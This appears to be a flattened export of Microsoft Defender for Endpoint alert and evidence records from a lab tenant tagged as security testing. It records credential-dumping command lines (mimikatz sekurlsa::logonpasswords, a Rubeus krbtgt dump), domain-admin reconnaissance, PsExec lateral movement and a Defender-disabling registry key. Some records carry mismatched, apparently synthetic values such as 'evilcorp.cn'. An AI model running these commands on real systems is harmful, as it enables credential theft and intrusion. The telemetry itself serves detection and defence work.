[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:34.4433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.4433333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-11T08:17:06.0049839Z", "processId": 684, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.4433333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'", "processCreationTime": "2022-11-11T08:16:44.2952776Z", "processId": 4704, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.5733333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-11T08:17:06.0711978Z", "processId": 4732, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.61Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-11T08:17:06.1346319Z", "processId": 7632, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.7266667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-11T08:17:06.1974235Z", "processId": 4312, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:34.9566667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-11T08:17:06.5868676Z", "processId": 2236, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037516238605644_1022196159
dfeb343f-5583-4d12-806b-8e9de9bec3b4
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:23.8605872Z
2022-11-12T01:35:42.87Z
2022-11-11T09:47:40.27713Z
2022-11-11T08:15:23.3115781Z
2022-11-11T08:17:05.7568492Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
Resolved
High
39
SuccessfullyRemediated
TruePositive
SecurityTesting
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1021.001", "T1555", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:23.9066667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:23.9066667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.", "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:20:23.9066667Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:23.9066667Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:20:23.9066667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads\\internal'", "processCreationTime": "2022-11-11T08:16:44.2952776Z", "processId": 4704, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T15:57:26.76Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:20:49.52Z
Suspicious
None
jeff
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:34.4833333Z
Suspicious
Active
hacker
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
7,684
Rubeus.exe dump /service:krbtgt /user:steve
2022-11-21T02:02:27.8934015Z
1,972
2022-11-21T02:02:27.8509284Z
cmd.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:33:31.3666667Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T07:37:49.3133333Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T05:36:50.2133333Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:20:01.6733333Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:34:24.9733333Z
Suspicious
None
darol
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:50:49.9533333Z
Benign
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,772
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-12-22T08:47:23.3350389Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638041865532032667_1340990957
58804b1c-2e93-42c6-8b39-f4524f2513db
728
MicrosoftDefenderForEndpoint
2022-11-16T09:09:13.2032964Z
2022-11-19T01:35:45.0566667Z
2022-11-19T01:35:45.03Z
2022-11-16T09:07:25.1468318Z
2022-11-16T09:07:25.1468318Z
Attempt to turn off Microsoft Defender Antivirus protection
An attempt was made to turn off a protection feature in Microsoft Defender Antivirus. An attacker might be trying to evade detection.
DefenseEvasion
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ac5d5f4f-fab6-41d4-b1b0-552f3c51cea1
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1562.001" ]
[ { "aadDeviceId": "c053f02e-4bf2-4146-8faa-8971c550f156", "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-srv2016.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:30:43.818Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jesse", "domainName": "MSDXV2" } ], "mdatpDeviceId": "7114973b832b32d349815a5d2811738cc10fa650", "onboardingStatus": "Onboarded", "osBuild": 14393, "osPlatform": "WindowsServer2016", "osProcessor": "x64", "rbacGroupName": "Servers", "riskScore": "Medium", "tags": [ "servers" ], "version": "1607", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Srv2016", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "95663e98-7c5e-4f11-b36d-28fb17df5fe1" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Registry", "evidenceCreationTime": "2022-11-16T09:09:13.3533333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": "HKEY_LOCAL_MACHINE", "registryKey": "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "registryValue": "", "registryValueType": "Unknown", "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:26.0433333Z
Suspicious
None
jeff
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:20:49.52Z
Unknown
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:24.7566667Z
Suspicious
None
guest
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,772
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-12-22T08:47:23.3350389Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638045930768340787_471517191
630cc631-5be4-4159-909f-dab5a338d73c
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:36.8341051Z
2022-11-21T02:22:48.27Z
null
2022-11-21T02:01:45.1526175Z
2022-11-21T02:20:27.7648847Z
'Kekeo' malware was detected during lateral movement
'DefenderObservation.ThreatFamily' malware was detected on this device. An attacker might be attempting to move laterally to this device from another device on the network.
LateralMovement
New
Medium
49
PendingApproval
null
null
WindowsDefenderAtp
7a6f0432-57d7-4a96-a286-0bd733ea425d
null
null
null
[ "T1021.002", "T1074.002", "T1543.003", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "Low", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:36.8866667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:04:36.8866667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:04:36.8866667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-21T02:04:36.8866667Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-21T02:21:44.9566667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:21:44.9566667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:44:38.9333333Z
Suspicious
None
Takeshi
staging.net
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:47.4866667Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:27.94Z
Suspicious
None
svc_acct
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:52.3Z
Suspicious
None
jeff
internal.corp
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:05:51.15Z
Suspicious
None
jeff
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045938684726164_-666704430
da638045938684726164_-666704430
765
MicrosoftDefenderForEndpoint
